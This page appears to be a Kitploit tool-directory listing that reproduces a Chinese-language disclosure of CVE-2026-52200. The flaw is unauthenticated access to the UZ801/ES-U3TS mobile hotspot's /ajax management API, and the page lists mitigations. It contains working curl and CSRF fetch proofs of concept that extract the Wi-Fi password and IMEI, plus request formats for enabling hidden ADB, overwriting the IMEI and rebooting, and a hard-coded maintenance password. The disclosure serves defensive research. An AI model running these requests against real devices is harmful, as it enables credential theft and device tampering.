Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-52200 — Security advisory detailing broken access control in UZ801/ES-U3TS MifiService web API, allowing unauthenticated data extraction, config modification, and device reboot. Includes PoCs and mitigations. | Kitploit
工具/GitHubGitHub/lamaper/cve-2026-52200
IoT SecurityVulnerability AnalysisExploitationConfiguration AuditingInformation GatheringWeb SecurityPenetration Testing
GitHublamaper/cve-2026-52200

CVE-2026-52200

Security advisory detailing broken access control in UZ801/ES-U3TS MifiService web API, allowing unauthenticated data extraction, config modification, and device reboot. Includes PoCs and mitigations.

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

UZ801 / ES-U3TS MifiService 访问控制失效漏洞

本仓库用于公开披露 OEM / 白牌 UZ801_v2.1 4G LTE 随身 Wi-Fi 平台中 MifiService.apk 管理接口的访问控制缺陷,并为 CVE 申请提供可公开引用的材料。

当前样机还观察到以 ES-U3TS 形式售卖的同源产品,因此本文使用 UZ801 / ES-U3TS 作为公开命名。

摘要

受影响设备在本地管理地址上暴露了 Jetty Web API:

root@kitploit:~
http://192.168.100.1/ajax

后端请求分发核心位于:

root@kitploit:~
com.mifiservice.server.AjaxSevlet

虽然前端存在登录页,但后端并没有对绝大多数管理功能真正执行“已认证会话”校验。因此,接入同一热点的攻击者可以直接构造带 funcNo 的 JSON 请求,在未登录状态下读取敏感信息、修改配置,甚至触发高影响设备管理动作。

已验证影响包括:

  • 直接读取当前 Wi-Fi 密码明文
  • 直接读取 IMEI、固件版本、SIM 状态、网络配置
  • 直接读取 DHCP 与 MAC 过滤配置
  • 直接修改并持久化管理配置
  • 直接触发配置恢复默认并重启

通过静态分析还确认了更高风险的维护功能:

  • 重启到 bootloader
  • 开启隐藏的 ADB / Qualcomm Diag USB 调试模式并重启
  • 通过未公开接口改写 IMEI

产品命名与范围

当前掌握的事实表明,这是一套 OEM / 白牌方案,真实上游开发厂商尚未确定,目前也没有找到可靠的厂商安全响应联系方式。

因此本文使用以下识别方式:

  • 板级标识:UZ801_v2.1
  • 观察到的销售别名:ES-U3TS
  • 实测固件版本:UZ801-V3.4.3
  • 实测 APK:MifiService.apk
  • 实测包名:com.mifiservice.hello

若后续发现其它贴牌产品具备相同固件、相同 APK、相同 Web 资源和相同 funcNo 行为,应视为同一代码系的疑似受影响变体。

受影响组件

  • /ajax Web API 端点
  • MifiService.apk
  • com.mifiservice.server.AjaxSevlet

产生原因

漏洞产生的原因是后端访问控制失效:

  • 大多数敏感请求不要求已认证的服务端会话
  • 缺少 CSRF 防护
  • 不校验 Origin
  • 不校验 Referer
  • 大多数敏感功能不要求 session cookie 或 token

登录功能虽然存在,但并没有为绝大多数管理 API 建立有效的授权边界。

攻击模型

主要攻击路径:

  • 接入同一热点的相邻网络攻击者

次级攻击路径:

  • 对当前已连接设备热点的受害者浏览器发动 CSRF / Drive-by 攻击

默认情况下,这不是一个公网直接远程攻击面。攻击者需要:

  • 直接能访问 192.168.100.1
  • 或诱导一个已连接该热点的受害者浏览器代为发起请求

按功能分组的漏洞点

未授权敏感信息泄露

未授权配置修改

未授权高影响管理动作

未公开 / 维护型功能

funcNo功能状态说明
2003隐藏维护口令路径静态确认使用硬编码 admin8888,行为疑似残留

厂商状态

  • 上游原始开发厂商:未知
  • 产品类型:OEM / 白牌随身路由平台
  • 可靠的 PSIRT / 安全邮箱:未找到
  • 当前披露状态:厂商不可确认,安全联系渠道不可达

截至本文撰写时,该设备更像是经由 OEM / 经销商渠道流转的白牌方案,品牌信息不稳定甚至缺失,尚未确认到可信的原始开发厂商联系方式。

安全克制的 PoC

下述 PoC 仅用于证明漏洞存在,刻意限制为只读或低影响操作,不提供武器化利用流程。

1. 未登录读取当前 Wi-Fi 密码

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1002}' \
  http://192.168.100.1/ajax

预期:

  • 返回 JSON
  • 包含 ssid
  • 包含明文 pwd

2. 未登录读取设备标识信息

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1029}' \
  http://192.168.100.1/ajax

预期:

  • 返回 JSON
  • 包含 imei
  • 包含 fwversion

3. 用低风险字段证明“未登录可持久写入”

读取当前语言:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1030}' \
  http://192.168.100.1/ajax

修改语言:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1031,"Language":"Chinese"}' \
  http://192.168.100.1/ajax

测试结束后请改回原始值。

4. 浏览器 CSRF / Drive-by 概念验证

该接口不校验会话状态,也不校验 Origin / Referer。因此,已连接该热点的受害者浏览器可被诱导在后台发起请求。

最小化演示页面:

root@kitploit:~
<!doctype html>
<meta charset="utf-8">
<script>
fetch("http://192.168.100.1/ajax", {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  body: JSON.stringify({funcNo: 1002})
});
</script>

这里故意只使用只读接口号,不应对用户或生产设备进行任何实际攻击。

高风险接口的非公开请求格式

以下内容仅为防御性分析和修复参考,不附带公开执行步骤。

2001 - 开启隐藏调试接口

root@kitploit:~
{"funcNo":2001}

代码行为:

  • 执行 setprop persist.sys.usb.config rndis,serial_smd,diag,adb
  • 执行 sync
  • 重启设备

2004 - IMEI 覆写路径

root@kitploit:~
{"funcNo":2004,"imei":"<redacted-test-value>"}

代码行为:

  • 调用等价于 AT+WRIMEI=<value> 的链路
  • 再通过读回路径校验写入结果

考虑法律、合规与设备完整性风险,本文不公开真机执行步骤。

证据片段

1002 未登录返回示例

root@kitploit:~
{
  "results": [
    {
      "dns1": "8.8.8.8",
      "ssid": "4G-UFI-8E1",
      "dns2": "8.8.8.8",
      "mask": "255.255.255.0",
      "pwd": "1234567890",
      "wlan_ip": "192.168.100.1",
      "IP": "192.168.100.1"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

1029 未登录返回示例

root@kitploit:~
{
  "results": [
    {
      "manufacture": "Qualcomm Technology",
      "dbm": "",
      "fwversion": "V3.4.3",
      "imei": "863993064154463"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

CVE建议

建议归类:

  • CWE-306 Missing Authentication for Critical Function
  • CWE-862 Missing Authorization

建议 CVSS:

root@kitploit:~
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

披露状态

  • 静态分析完成:2026-05-11
  • 真机验证完成:2026-05-12
  • 厂商联系材料准备完成:2026-05-12
  • 公开披露草案完成:2026-05-12

修复建议

  • 所有管理功能强制要求服务端认证会话
  • 未认证请求默认拒绝
  • 增加 CSRF 防护
  • 校验 Origin 与 Referer
  • 从量产固件中删除隐藏维护接口
  • 不要通过未认证 API 返回 Wi-Fi 密码等秘密信息

法律与安全声明

本仓库仅用于防御性研究、漏洞披露和修复协调。公开示例已刻意限制为低风险验证,不提供可直接武器化的利用步骤。

下载工具
funcNo功能状态说明
1002读取 SSID、设备 IP、DNS、Wi-Fi 密码真机验证返回 Wi-Fi 密码明文
1009读取 Wi-Fi 加密类型和密码真机验证返回 Wi-Fi 密码明文
1011读取 DHCP 范围、DNS、客户端列表真机验证便于内网侦察
1015读取 SIM 状态真机验证泄露运行状态
1029读取 IMEI、固件、厂商、信号信息真机验证泄露设备标识
1052读取 MAC 过滤模式和条目真机验证泄露访问控制配置
2002读取当前 SIM 槽位真机验证泄露运行状态
funcNo功能状态说明
1004修改联网模式静态确认未见会话校验
1005修改网络制式静态确认可影响联网能力
1007修改 SSID / 最大接入数静态确认会持久化并影响 AP
1010修改 Wi-Fi 加密类型 / 密码静态确认高影响
1012修改 DHCP / DNS 相关配置静态确认可篡改局域网行为
1016/1017/1018APN 读取 / 设置 / 切换静态确认影响 WAN 行为
1031修改语言并持久化真机验证作为低风险写入型 PoC
1053/1054/1055修改 MAC 过滤模式与条目静态确认可篡改网络接入控制
funcNo功能状态说明
1013重启设备真机验证DoS
1014恢复应用/网络配置默认并重启真机验证不是整机 userdata 擦除
2000重启到 bootloader真机验证运维风险高
2001开启隐藏 ADB/Diag 并重启静态确认隐藏维护路径
2004覆写 IMEI静态确认走 AT 指令链路,公开验证未执行